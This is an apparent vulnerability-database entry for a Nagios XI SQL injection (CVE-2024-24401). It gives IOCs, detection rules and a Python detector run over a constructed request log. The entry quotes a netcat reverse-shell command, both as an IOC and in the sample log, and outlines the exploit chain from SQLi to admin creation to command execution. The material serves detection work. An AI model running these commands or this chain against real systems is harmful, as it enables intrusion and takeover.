cvebase
CVE-2024-24401
published 2024-02-26

Priority: P2 (73)
Severity: critical, CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 45.88% (98.7th percentile)

SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component.

Affected (1 range)

Vendor   Product    Version range   Fixed in
nagios   nagios_xi  (none given)    (none given)

Detection & IOCs (extracted from sources)

url: http://{IP}/nagiosxi/api/v1/authenticate?pretty=1
url: http://{IP}/nagiosxi/login.php?token={token}
path: /nagiosxi/config/monitoringwizard.php
cookie: nagiosxi
command: nc -e /usr/bin/sh {LHOST} {LPORT}
path: /nagiosxi/includes/components/ccm/index.php
path: /nagiosxi/includes/components/nagioscorecfg/applyconfig.php
path: /nagiosxi/includes/components/ccm/command_test.php
url: http://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1
  • Detect SQL injection attempts against monitoringwizard.php where the injection marker is appended as an extra path segment after the script name (e.g. the '/1*' pattern, sqlmap's custom injection-point syntax, so the payload arrives as PATH_INFO rather than as a query parameter) combined with the query string update=1&nextstep=2&wizard=mysqlserver
  • Monitor for POST requests to /nagiosxi/includes/components/ccm/index.php whose tfCommand field contains 'nc -e' (a netcat reverse shell); this is the post-exploitation step that defines a malicious Nagios command
  • Alert on GET requests to command_test.php with cmd=test&mode=test, which executes the attacker-defined Nagios command
  • Detect the rapid API sequence POST /nagiosxi/api/v1/authenticate, then GET /nagiosxi/login.php?token=, then POST /nagiosxi/api/v1/system/user with auth_level=admin from the same source; this is the signature of automated admin-account creation
  • The exploit targets the 'id' parameter of monitoringwizard.php with sqlmap using --technique=ET (error-based and time-based blind) to read the xi_users table of the nagiosxi database and extract API keys
  • The exploit targets Nagios XI 2024R1.01 specifically; the injection is in the monitoringwizard.php component and the public PoC requires an authenticated (non-admin) session. This conflicts with the PR:N (no privileges required) in the CVSS vector above, so treat a low-privilege account as a practical prerequisite of the known exploit
  • The exploit hardcodes an intermediate password change to 'mawk' for the initial low-privilege user before running sqlmap; detection logic should account for this forced password-change step
  • The exploit reads the 'Nagios Administrator' API key from xi_users and uses it to create a new admin account via the REST API; that admin key is the pivot between the SQLi and full RCE
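The four detection rules above, implemented over a constructed JSON-lines request log as an added example (this is editor-written code, not a cvebase detection rule or the PoC's own code). It assumes a reverse proxy or WAF that records the request body, because the tfCommand check needs the POST form field, which a plain access log does not carry; the record field names (ts, src, method, uri, body), the sample traffic, the 120-second correlation window and the SQL token list are all assumptions. The sqlmap-marker rule treats the text after monitoringwizard.php/ as the injected PATH_INFO segment, which is where the '/1*' marker places the payload.

```python
import json
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample records (not real traffic). One attacker (203.0.113.7)
# walks the full chain; 198.51.100.22 is benign use of the same endpoints.
SAMPLE_LOG = r"""
{"ts": "2024-03-01T10:00:00Z", "src": "203.0.113.7", "method": "POST", "uri": "/nagiosxi/api/v1/authenticate?pretty=1", "body": "username=lowpriv&password=mawk&valid_min=5"}
{"ts": "2024-03-01T10:00:01Z", "src": "203.0.113.7", "method": "GET", "uri": "/nagiosxi/login.php?token=deadbeef", "body": ""}
{"ts": "2024-03-01T10:00:03Z", "src": "203.0.113.7", "method": "GET", "uri": "/nagiosxi/config/monitoringwizard.php/1%20AND%20SLEEP(5)?update=1&nextstep=2&wizard=mysqlserver", "body": ""}
{"ts": "2024-03-01T10:00:20Z", "src": "203.0.113.7", "method": "POST", "uri": "/nagiosxi/api/v1/system/user?apikey=ADMINKEY&pretty=1", "body": "username=backdoor&password=x&name=bd&email=bd%40example.invalid&auth_level=admin"}
{"ts": "2024-03-01T10:00:25Z", "src": "203.0.113.7", "method": "POST", "uri": "/nagiosxi/includes/components/ccm/index.php", "body": "tfCommand=nc+-e+%2Fusr%2Fbin%2Fsh+198.51.100.9+4444&tfName=pwn"}
{"ts": "2024-03-01T10:00:26Z", "src": "203.0.113.7", "method": "GET", "uri": "/nagiosxi/includes/components/ccm/command_test.php?cmd=test&mode=test", "body": ""}
{"ts": "2024-03-01T10:05:00Z", "src": "198.51.100.22", "method": "GET", "uri": "/nagiosxi/config/monitoringwizard.php?update=1&nextstep=2&wizard=mysqlserver", "body": ""}
{"ts": "2024-03-01T10:06:00Z", "src": "198.51.100.22", "method": "POST", "uri": "/nagiosxi/api/v1/authenticate?pretty=1", "body": "username=ops&password=secret"}
"""

WIZARD = "/nagiosxi/config/monitoringwizard.php"
CCM_INDEX = "/nagiosxi/includes/components/ccm/index.php"
CCM_TEST = "/nagiosxi/includes/components/ccm/command_test.php"
# Assumed token list: enough to catch sqlmap's error/time-based payloads.
SQL_TOKENS = re.compile(r"(?i)(\bsleep\s*\(|\bbenchmark\s*\(|\bunion\b|\bselect\b|\band\b|\bor\b|'|\")")


def parse_record(line):
    """Split one JSON record into decoded path, query dict and body dict."""
    rec = json.loads(line)
    parts = urlsplit(rec["uri"])
    return {
        "ts": datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": rec["src"],
        "method": rec["method"].upper(),
        "path": unquote(parts.path),
        "query": {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()},
        "body": {k: v[0] for k, v in parse_qs(rec["body"], keep_blank_values=True).items()},
    }


def sqli_probe(r):
    """Rule 1: SQL-looking payload in the PATH_INFO segment after monitoringwizard.php."""
    if not r["path"].startswith(WIZARD + "/") or r["query"].get("wizard") != "mysqlserver":
        return None
    extra = r["path"][len(WIZARD) + 1:]
    if SQL_TOKENS.search(extra):
        return f"SQLi probe in monitoringwizard.php path segment: {extra!r}"
    return None


def reverse_shell_command(r):
    """Rule 2: CCM command definition whose tfCommand carries 'nc -e'."""
    if r["method"] == "POST" and r["path"] == CCM_INDEX:
        cmd = r["body"].get("tfCommand", "")
        if "nc -e" in cmd:
            return f"reverse-shell command defined via CCM: {cmd!r}"
    return None


def command_test_trigger(r):
    """Rule 3: command_test.php invoked with cmd=test&mode=test (runs the stored command)."""
    if r["method"] == "GET" and r["path"] == CCM_TEST \
            and r["query"].get("cmd") == "test" and r["query"].get("mode") == "test":
        return "command_test.php invoked with cmd=test&mode=test"
    return None


class AdminCreationChain:
    """Rule 4: per-source state machine authenticate -> login.php?token= -> system/user auth_level=admin."""
    WINDOW = timedelta(seconds=120)  # assumed correlation window

    def __init__(self):
        self.state = {}  # src -> (stage, timestamp of first step)

    def feed(self, r):
        stage, t0 = self.state.get(r["src"], (0, r["ts"]))
        if stage and r["ts"] - t0 > self.WINDOW:  # chain went stale, start over
            stage, t0 = 0, r["ts"]
        if stage == 0 and r["method"] == "POST" and r["path"] == "/nagiosxi/api/v1/authenticate":
            self.state[r["src"]] = (1, r["ts"])
        elif stage == 1 and r["method"] == "GET" and r["path"] == "/nagiosxi/login.php" and "token" in r["query"]:
            self.state[r["src"]] = (2, t0)
        elif stage == 2 and r["method"] == "POST" and r["path"] == "/nagiosxi/api/v1/system/user" \
                and r["body"].get("auth_level") == "admin":
            self.state.pop(r["src"], None)
            return "automated admin creation: authenticate -> login.php?token= -> system/user auth_level=admin"
        return None


def analyze(lines):
    """Run every rule over each record; return (timestamp, source, message) alerts in log order."""
    chain = AdminCreationChain()
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        r = parse_record(line)
        for rule in (sqli_probe, reverse_shell_command, command_test_trigger, chain.feed):
            hit = rule(r)
            if hit:
                alerts.append((r["ts"].isoformat(), r["src"], hit))
    return alerts


if __name__ == "__main__":
    for ts, src, msg in analyze(SAMPLE_LOG.splitlines()):
        print(ts, src, msg)
```

On the sample feed this raises four alerts, all for 203.0.113.7 and in exploit order (SQLi probe, admin creation, reverse-shell command, command_test trigger); the benign host's wizard page view and lone authenticate call stay silent. The chain rule keys on source address, so an attacker rotating egress IPs between steps would need a session- or user-keyed variant.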